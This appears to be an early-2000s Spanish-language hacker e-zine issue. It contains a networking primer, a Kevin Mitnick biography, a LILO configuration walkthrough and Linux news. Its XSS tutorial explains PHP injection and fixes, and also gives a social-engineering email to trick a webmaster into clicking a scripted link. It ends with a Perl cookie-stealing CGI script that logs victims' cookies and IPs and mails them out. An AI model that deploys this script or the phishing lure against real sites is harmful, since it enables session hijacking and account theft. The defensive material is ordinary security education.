Bueno gente vamos a tratar de explicar que es esto de las redes para los menos entendidos en el tema, ok, LET START...
La idea de interconectar computadores comenzo con la necesidad de reducir los insumos y las maquinarias de las empresas y la incomodidad de los operarios ya que por ejemplo para imprimir algo se tenia que bajar a discos, ir fisicamente a la maquina que tenia la impresora y asi imprimirlo gastando mas tiempo del que es necesario ya que si en ese momento la impresora esta en uso no se podia continuar.
Asi se crearon las primeras redes, pero seguian siendo deficientes ya que cada red tenia sus red y sus protocolos haciendo que fuera imposible conectar dos redes o incluso cambiar partes de la misma red; asi fue como se crearon los modelos de referencia
(OSI entre los mas conosidos creado en los 80 por iso) hechos para normalizar y compatibilizar estos componentes pero eso es un tema que tocaremos en otro momento.
Como se imaginaran las redes se pueden dividir en muchas categorias, hoy veremos dos de ellas, quizas las mas importantes o genericas, la primera por zona geografica, y la segunda por "tipo de transmicion"...
1) Zona geografica (en escala decresiente)
*Microcomputadoras (toda coputadora puede verse como una red, ya que posee canales de comunicacion, reseptores y transmisores dentro de ella)
*Lan (Local Area Network... se considera red lan al conjunto de computadoras que se encuentren interconectadas con cualquier dispositivo hasta una distancia de 1km. Las velocidades mas comunes en este tipo de redes es de 10/100 mbps)
*Man (Metropolitan Area Network... son identicas a las LAN solo su rango de distancia es mayor, los 10km, por lo general esta conformada por un conjunto de LANs enterconectadas)
*Wan (WIde Area Network... son las redes mas extensas, incluso se puede tomar a internet como una red WAN, y estan conformadas por grupos de las anteriores)
2)Tipo de transmicion (Para diferenciarlos usaremos 2)
* Broadcast (Es un solo canal de comunicacion que conecta a todas las computadoras, por ende un paquete que mande una maquina le llegara a todas las que esten conectadas a la red)
* Point-To-Point (PTP) (Es lo mas comun en estos dias, los paquetes enviados viajan por la red por distias computadoras por medio de un ruteo previo, esto significa que un paquete mandado de un ordenador A a uno B no sera inviado a todas sino que sera mandado por la direccion mas corta posible, por esto se dice que es una red de conexion entre multiples pares de maquinas.
Bueno espero que esto les sirva de algo, en proximos informes iremos puliendo mas cada una de estos datos. Hasta Pronto.
Binary Overwrite
|
A sus 39 años de edad, Kevin Mitnick,
el hacker más famoso de todos los tiempos, volvio a estar online el 20 de
Enero.
Tras ser detenido en 1995 por el FBI, que lo acusaba de introducirse en
los sistemas informáticos de empresas como Motorola Inc., Novell Inc.,
Nokia Corp. y Sun Microsystems fue condenado a 46 meses de prisión.
No obstante en enero del 2000 salió en libertad condicional, aunque el
juez le prohibió usar equipos informáticos durante 3 años.
El plazo expiró el 20 de enero, y Kevin volvio a tocar un ordenador de
nuevo. La Historia del Chacal de la Red
Como Hacker, la carrera de Kevin Mitnick comenzo a los 16 años, cuando
obsesionado por las redes de computadoras rompio la seguridad del sistema
administrativo de su colegio, pero no para alterar sus notas, lo hizo
"solo para mirar".
Su bautizo como infractor de la ley fué en 1981, cuando junto a dos
amigos entro físicamente en las oficinas de COSMOS de Pacific Bell.
COSMOS (Computer System for Mainframe Operations), disponía de una
gigantesca base de datos empleada por la mayor parte de las compañías
telefonicas norteamericanas y que servía para controlar el registro de
llamadas.
Una vez dentro de las oficinas obtuvieron la lista de claves de seguridad,
la combinacion de las puertas de acceso de varias sucursales y manuales
del sistema COSMOS. La informacion robada tenía un valor equivalente a
los 200.000 dólares.
La novia de uno de ellos los delató, aunque y debido la su minoria de
edad de Mitnick la Corte Juvenil lo sentencio a tres meses de carcel y a
un año bajo libertad condicional.
Tras haber cumplido la condena el oficial custodio encargado de su caso
encontró que su teléfono había sido desconectado y que la compañia
telefónica no disponía de registro de él.
Sus objetivos iban creciendo, y en 1982 entró ilegalmente, via modem, a
la computadora del North American Air Defense Command en Colorado, aunque
antes alteró el programa encargado de rastrear la procedencia de las
llamadas, trucando la procedencia de la suya.
Un año mas tarde, cuando estudiaba en la Universidad del Sur de
California, fue arrestado de nuevo por entrar ilegalmente en ARPAnet (la
predecesora de Internet), e intentar entrar en los ordenadores del Pentágono.
Esta vez fué sentenciado a seis meses de carcel en una prision juvenil de
California.
En 1987 volvió a ser acusado, en Santa Cruz California, de invadir el
sistema de la compañia Microcorp Systems. Le cayeron tres años de
libertad condicional, tras la cual su expediente desaparecio
misteriosamente de los ordenadores de la policía local.
Posteriormente solicita trabajo en el Security Pacific Bank como encargado
de la seguridad de la red del banco, el tras ser rechazado por sus
antecedentes penales, Mitnick procede a falsificar un balance general del
banco donde aparecían perdidas por valor de 400 millones de dolares.
Ese mismo año comienza el escandalo que lo lanzo definitivamente a la
fama. Durante meses observó en secreto el correo electronico de los
miembros del departamento de seguridad de MCI Communications y Digital
Equipment Corporation. Descubriendo el sistema de protección del sistema
telefonico de ambas compañias.
Tras recoger suficiente informacion se apodera de varios codigos de
seguridad de MCI y junto su amigo, Lenny DiCicco, asalta la red del
laboratorio de investigaciones de Digital Corporation, conocida como
Easynet.
La intención de los hackers era obtener una copia de la versión beta del
nuevo sistema operativo de Digital "VMS". No obstante el
personal de seguridad de Digital se dio cuenta del ataque y alertaron al
FBI, el cual comienza a rastrear a los hackers.
Mitnick fue un mal complice, ya que intentó cargar el muerto a DiCicco,
mediante llamadas anónimas al jefe de la empresa de software en la que
trabajaba este.
DiCicco, frustrado y lleno de rabia, confiesa la verdad ante el FBI, el
cual procede a arrestar a Mitnick en 1988, Digital Equipment le acusa de
haberle ocasionado daños cuantificados en 4 millones de dolares.
Mitnick fué declarado culpable de los cargos de fraude con computadoras y
de posesion ilegal de codigos de acceso.
Adicionalmente el fiscal consiguió una orden que prohibia a Mitnick el
uso del telefono en prision alegando que a través de ellas podria tener
acceso a todo tipo de ordenadores.
El juez únicamente lo autorizó a realizar llamadas a su abogado, a su
esposa, a su madre y a su abuela y siempre bajo la supervisión de un
oficial de la prision.
Gracias a que el abogado de Mitnick logró convencer al juez de que este
sufria adiccion a las computadoras, la sentencia fué de tan solo un año
de prisión, tras el cual debería seguir un programa de rehabilitación
de 6 meses.
Tras el año de prisión y durante el tratamiento Mitnick logró no tocar
un ordenador y perder hasta 45 kilos de peso.
Ya en 1991, tras haber ocupado la primera plana del New York Times, uno de
sus reporteros, John Markoff, decide escribir un libro en el que narraba
las correrías informáticas de Mitnick.
El libro no resulta del agrado de Mitnick, que procede a hackear la cuenta
de correo electrónico de Markoff.
En 1992, Mitnick comienza a trabajar para una agencia de detectives, que
pronto descubre que está usando fraudulentamente su base de datos.
El FBI vuelve a intervenir, registrando su casa sin conseguir dar con el.
Mitnick se había convertido en un Hacker profugo.
El Departamento de Vehiculos de California ofrece una recompensa de un
millon de dolares a todo aquel que ayudara al arresto de Mitnick, al que
acusaban de haber tratado de obtener una licencia de conducir de manera
fraudulenta, empleando falsos codigos de acceso.
Mitnick decide enfrentarse con los ordenadores de Tsutomu Shimomura, un físico
experto en sistemas de seguridad que estaba encargado del "San Diego
Computer Center".
Shimomura descubre a Mitnick invadiendo sus sistemas, lo que hace que se
plantee como un reto personal atrapar al popular hacker.
A finales de enero de 1995, un programa diseñado por Shimomura es
localizado en una cuenta en "The Well", un proveedor de Internet
en California. Mitnick habia creado una cuenta fantasma en dicho proveedor
desde la que estaba utilizando las herramientas de Shimomura para atacar
una docena de corporaciones, entre las que se encontraban Motorola, Apple
y Qualcomm.
Tras reunirse Shimomura con el gerente de "The Well" y con un
tecnico de Sprint (proveedor de servicios telefonicos celulares) descubre
que Mitnick había creado un numero celular fantasma para acceder al
sistema.
Tras dos semanas de rastreo consiguen determinar que las llamadas
provenian de Raleigh, California.
Shimomura se traslada a Raleigh, donde recibe una llamada de un experto en
seguridad de InterNex, otro proveedor de Internet en California, alertándole
de que Mitnick habia invadido el sistema de InterNex.
Por otro lado Shimomura disponía de informacion sobre la invasion de
Mitcnick a Netcom, una red de base de datos de noticias. Shimomura se
comunica con el FBI, el cual envía a un grupo de rastreo por radio, capaz
de rastrear las llamadas de Mitnick.
El arresto se produce el día 16 de Febrero, en el apartamento de Mitnick,
que abrió con toda calma al FBI.
De regreso a su hotel y al comprobar Shimomura su contestador telefónico
descubre varios mensajes burlescos de Mitnick en tono oriental, el último
de los cuales habia sido recibido ocho horas despues de que Mitnick
hubiera sido arrestado.
El como se realizo esa llamada aun es un misterio.
|
Introducción
°°°°°°°°°°°°
Este texto busca explicar la falla XSS (o CSS o Cross Site Scripting), en qué consiste y como puede ser usada, a fin de comprender el método de protección, ya que la misma es mucho más eficaz si se comprende el método de ataque.
Comprensión
°°°°°°°°°°°°
El XSS consiste en la inyección (o ejecución), de scripts que permitan el acceso a datos contenidos en otro servidor.
La ejecución se hace por parte del cliente y por la del servidor.
Se necesita la Ingeniería Social para poder acceder a este tipo de atacas, debido a le hecho de que es generalmente a través de una URL que el XSS se lleva a cabo.
Un ejemplo concreto...
Imaginemos una pagina PHP que permita mostrar articulos. Una parte del código PHP podría ser:
----------------
<?
[...]
echo "<u>Title : </u><br><br>$title";
[...]
?>
----------------
Para mostrar el título del artículo.
Si la variable $title no está definida con anterioridad en el script, un url podría mostrar un titulo definido. por ejemplo:
http://[website]/articles.php?title=14000%20nouveaux%20cas%20de%20sida%20par%20jour.&id=58
En la página HTML devuelta por el servidor apache aparecerá:
-----------------------------------------------------------------------
<u>Titre : </u><br><br>14000 nouveaux cas de sida par jour.
-----------------------------------------------------------------------
Para hacer que el script se ejecute en la página el atacante debería tipear las dirección del tipo:
http://[website]/articles.php?title=[SCRIPT]&id=58
o
http://[website]/articles.php?title=4000%20nouveaux%20cas%20de%20sida%20par%20jour.[SCRIPT]&id=58
[SCRIPT] siendo un ejemplo no nocivo por, ejemplo:
-------------------------------------------
<script>alert('Hello World')</script>
-------------------------------------------
en el código HTML sería:
------------------------------------------------------------------------------
<u>Titre : </u><br><br><script>alert('Hello World')</script>
------------------------------------------------------------------------------
o
------------------------------------------------------------------------------------------------
<u>Titre : </u><br><br>14000 nouveaux cas de sida par jour.<script>alert('Hello World')</script>
------------------------------------------------------------------------------------------------
Si por ejemplo tenemos en el indice el código :
--------------------------------
<?
include("files/".$page.".php");
?>
--------------------------------
Y que un atacante ingresa el URL:
http://[website]/index.php?page=[NOEXISTE]
Se vería un error del estilo siguiente:
-------------------------------------------------------------------------------------------------------------
Warning: Failed opening 'files/[NOEXISTE].php' for inclusion (include_path='') in /home/www/index.php on line 1
-------------------------------------------------------------------------------------------------------------
Si ahora la URL que ingresamos es http://[website]/index.php?page=[SCRIPT], en la página se mostrara la linea siguiente :
-------------------------------------------------------------------------------------------------------------
Warning: Failed opening 'files/[SCRIPT].php' for inclusion (include_path='') in /home/www/index.php on line 1
-------------------------------------------------------------------------------------------------------------
Un ejemplo de ingeniería social sería enviarle a WebMaster un mail con el contenido siguiente :
------------------------------------------------------------------------------------------------------------
Hola,
Hay un problema en su sitio http://[website]/.
No se bien pero la URL es:
<a href="http://[website]/articles.php?title=4000%20nouveaux%20cas%20de%20sida%20par%20jour.[SCRIPT]&id=58">
http://[website]/articles.php?title=14000%20nouveaux%20cas%20de%20sida%20par%20jour.&id=58
</a>
Bonne chance !
Bob
------------------------------------------------------------------------------------------------------------
EL Webmaster pensando que es un visitante sincero, hará un click en la URL del sitio, sin tener en cuenta el riesgo que esto implica. Y de esta manera ejecutara el script que deseemos.
Hubiera habido menos chances con un link del tipo:
------------------------------------------------------------------------------------------
<a href="javascript:[SCRIPT]">
http://[website]/articles.php?title=14000%20nouveaux%20cas%20de%20sida%20par%20jour.&id=58
</a>
------------------------------------------------------------------------------------------
el XXS permanente es más peligroso porque el script está SIEMPRE en el sitio y será ejecutado por varios visitantes.
El principio es el mismo, el script se puede encontrar en el GuestBook de un foro o en un HTML.......
Consecuencias del Cross Site Scripting :
- Recuperación de informaciones como la cookie o el URL
- Redirección hacia un URL, nociva o no.
- Recuperación de archivos que se encuentren en el disco de la victima.
Y eventualmente (según el OS y/o el navegador) :
- Bajar un archivo.
- Ejecución de un programa.
- Ejecución de un comando del sistema.
- ...
Esta provado entonces que el XSS no se puede subestimar.
Medidas de seguridad a tomar
°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Las 2 funciones principales tocadas por el XSS en PHP son las funciones echo y print ().
Es aconsejable entonces, en lugar de poner:
------------------
<?
print($variable);
?>
------------------
o
------------------
<?
echo $variable;
?>
------------------
a cada vez ingresar :
-----------------------------------
<?
print(htmlspecialchars($variable));
?>
-----------------------------------
o
-----------------------------------
<?
echo htmlspecialchars($variable);
?>
-----------------------------------
Para asugrar XSS proveniente de eroores podriamos pensar por ejemplo:
--------------------------------
@include("files/".$page.".php");
--------------------------------
en lugar de
-------------------------------
include("files/".$page.".php");
-------------------------------
pero tomaría mucho tiempo.
Lo mejor es poner en el principio de la pagina:
-------------------
error_reporting(0);
-------------------
Lo cual detendrá cualquier muestra de texto en caso de error. EXPLOIT
#!/usr/bin/perl
# robo.cgi
# depende del server
$mailprog = '/usr/sbin/sendmail';
# crea el log
open(COOKIES,">>stolen_cookie_file");
# html que vera la victima
print "Content-type:text/html\n\n";
print <<EndOfHTML;
<html><head><title>Robada</title></head>
<body>
cookie choreada
</body></html>
EndOfHTML
print COOKIES "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
# mailea el log
open{MAIL,"|$mailprog -t"};
print MAIL "To: mail\@algo.com\n";
print MAIL "From: mail\@algo\n";
print MAIL "Subject: Afano De Cookie\n\n";
print MAIL "-" x 75 . "\n\n";
print MAIL "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
close (MAIL); [De
Verstand para la Sikozine :)] |
Este es el famoso archivo /etc/lilo.conf,
no puede faltar para el arranque del LInux LOader (el cargador del linux)
Pasemos a ver las explicaciones....
prompt
>>Indica al lilo que deje al usuario seleccionar que sistema
arrancar
verbose=5
>>Modo detallado (el 1 es el detalle minimo y el 5 es el nivel de
detalle maximo)
timeout="50" >>Indica
cuanto tiempo da al usuario para elejir un sistema antes de que arranque
en el sistema por default (se mide en decisegundos)
default=linux
>> El sistema por defecto para arrancar
boot="/dev/hdg"
>> Indica el device (disco rigido en este caso) donde se encuentra
la imagen para bootear
map=/boot/map
>> El directorio del "mapa"
install=/boot/boot.b >> Otra
imagen de booteo, donde se encuentra el boot-sector.
message=/boot/message >> El mensaje que
se muestra al arranque del lilo
lba32
>> Esta opcion permite que el lilo se aloje mas alla de los 1024
cilindros (no es necesario alojarlo en el Master Boot Record)
vga="791"
>> Indica el modo de video que se va a arrancar, en este caso
1024x768, 16 bbp (ver todos los modos mas abajo)
image="/boot/vmlinuz-2.4.7-10.new"
>>El directorio de la imagen para bootear
label="linux"
>>El nombre que aparecera en la pantalla
initrd="/boot/initrd-2.4.7-10.img" >>El
directorio de la imagen del init
read-only
>>Solo lectura, pero no le den bola por que no hace nada realmente
root="/dev/hdg2"
>>Indica la particion donde se tiene que montar el root
append="ata100.i"
>>Append sirve para pasar comandos adicionales al LILO, generalmente
esto solo se precisa para maquinas viejas o porque el LILO que no detectan
bien los discos
other=/dev/hdg1 >>Otro
sistema para arrancar
optional
>>Opcional :)
label=DOS
>>Nombre que aparecera en pantalla
Zipper
|
Salio
FreeBSD 5 RELEASE
Ya la pueden bajar de
linuxiso.org.Aca esta la lista de las novedades:
-
UFS2, la segunda
generacion del sistema de arcivos UFS.
-
Chequeo en segundo
plano del sistema de archivos
-
Soporte experimental
para "Mandatory Access Controls", provee una extensa y
flexible utilidad para admins para definir politicas de seguridad para
el sistema.
-
Soporte para Bluetooth,
ACPI, CardBus, IEEE 1394 y aceleracion experimental para criptografia
por hardware. Esto mantiene a FreeBSD actualizado con la tecnologia
mas nueva.
-
GCC 3.2.1
-
GEOM, el extenso y
flexible "framework" de almacenamiento, DEVFS, el
dispositivo de sistema de archivos virtual, simplifica el
almacenamiento y administracion de dispositivos mientras abre la
puerta para nuevas tecnologias de almacenamiento empresarial.
-
Soporte para
plataformas sparc64 y ia64.Expande el soporte de FreeBSD para
plataformas avanzadas de 64-bit.
Si quieren saber mas aca
hay algunas notas para profundisar en el tema...
MandrakeSoft
se vino abajo
La semana pasada
MandrakeSoft se declaró en cesación de pagos para sus deudas contraídas.Legalmente,esto
equivale también a una reorganización financiera que le permita a la
empresa renegociar sus deudas con sus acreedores, mientras continúa con
sus operaciones normales, que incluyen el lanzamiento de Linux-Mandrake
9.1 para Abril. Sin embargo, para algunos esto ya es el preludio de la
bancarrota...
Después de este último gran tropezón financiero, esta
interesante entreda en el blog de un usuario considera seriamente los
beneficios la posibilidad de convertir a Linux-Mandrake en una distribución
soportada por una organización sin fines de lucro apoyada por sus propios
usuarios, de una manera muy similar a cómo es Debian GNU/Linux.
----------------
Fuente: Vivalinux
----------------
MandrakeSoft nesecita 4 millones de EUROS para seguir operando. Nesecitan
esto porque en el 2000 decidieron transformar la compania a una "e-learning/e-support"
cuyos productos no sean basados en Linux. Asi incrementaron las gastos
operativos en un 400%.
Esperemos que Mandrake remonte vuelo...
Linux
ingresa al sistema educativo universitario de Argentina
En Marzo del 2003 comenzará
el primer ciclo lectivo de una carrera Linux muy particular: está
estructurada en cuatrimestres y materias, al igual que las carreras
universitarias. Con materias como Manejo de Terminales, Seguridad I y II,
Programación I y II y Metodologias para el desarrollo y la distribución
del Software la gente de Tuxsys (uno de los centros de capacitación en
sistemas Linux más importante de Argentina) intentará brindar al público
una manera sumamente sencilla y estructurada de "aprenderlo
todo" en solo 8 meses (dos cuatrimestres). El título que brindan es
el de "Administrador Avanzado de Sistemas Linux" y para
obtenerlo es necesario rendir una serie de examenes al final de la
carrera."
-----------------
Fuente:VivaLinux
----------------
es una exelente noticia, pienso que va a llevar a que cada vez haya mas
expertos y que los argentinos informaticos (admins,hackers,programadores,etc)
sean mas conocidos internacionalmente gracias a estas carreras de Linux.
Es un exelente incentivo para que cada vez mas gente se interese en el
tema.
Trustation
llega a la Argentina !!!
Trustation Argentina (www.trustation.com)
es el distribuidor en Argentina, Uruguay y Paraguay de TRUSTIX AS, empresa
lider a nivel mundial de soluciones e-business y seguridad basada sobre
TSL (Trustix Secure Linux), considerado el Linux mas seguro del mundo. La
solucion e-business de Trustix esta compuesta por 5 modulos, firewall con
VPN server, mail server, proxy server, lan server y web server. Todas las
herramientas se administran desde un unico punto y a traves de una consola
grafica intuitiva (GUI) que corre tanto bajo windows como linux, desde
esta consola tambien puede administrarse cualquier otro Linux.
Fuente: VivaLinux
La
"Linux Box" mas poderosa del mundo
En la ultima LinuxWorld SGI
debuto su nuevo sistema basado en Linux, SGI Altix 3000, con 64
procesadores de 64 bit (basados en el Intel Itanium 2), 512GB de
memoria.Este sistema marca la apertura de una nueva frontera en la
investigacion cientifica y los problemas a la demanda de "HPC"(High
Performance Computing, o Computadoras de Alto Rendimiento), que pueden ser
aplicados en Linux en diferentes maneras que antes no eran posibles. El
entorno de HPC continua empujando los limites del sistema operativo,
demandando un enorme numero de CPUs y mayor ancho de banda de I/O
(entrada/salida). Este sistema esta basado en SGI NUMAflex global shared-memory
architecture (acceso no-uniforme)
Temprano, cuando esta super
computadora estaba en desarrollo, SGI tomo la decision de usar
exclusivamente Linux como sistema operativo para esta nueva plataforma.
Una futura version de este
sistema promete ofrecer 512 procesadores y 4 TB de memoria (!!).
Aca vemos las comparaciones
(sistema de archivos, el sistema de acceso a discos y la CPU) de la
supercomputadora con computadoras convencionales:
 

---------------------------------------------------------
Fragmento obtenido de Linux
Journal (traducido y editado)
---------------------------------------------------------
VARIAS
- Salio
KDE 3.1 !!!! se dice que es mas rapida que KDE 3 ... |
- Linux reemplazara al AIX, el sistema
de IBM basado en unix.Esto se debe a que en el 2002 IBM tuvo ganancias por
U$S 1.5 Billones en concepto de productos y servicios relacionados con
Linux...|
- Intel promete 10 ghz para el año
2005|
|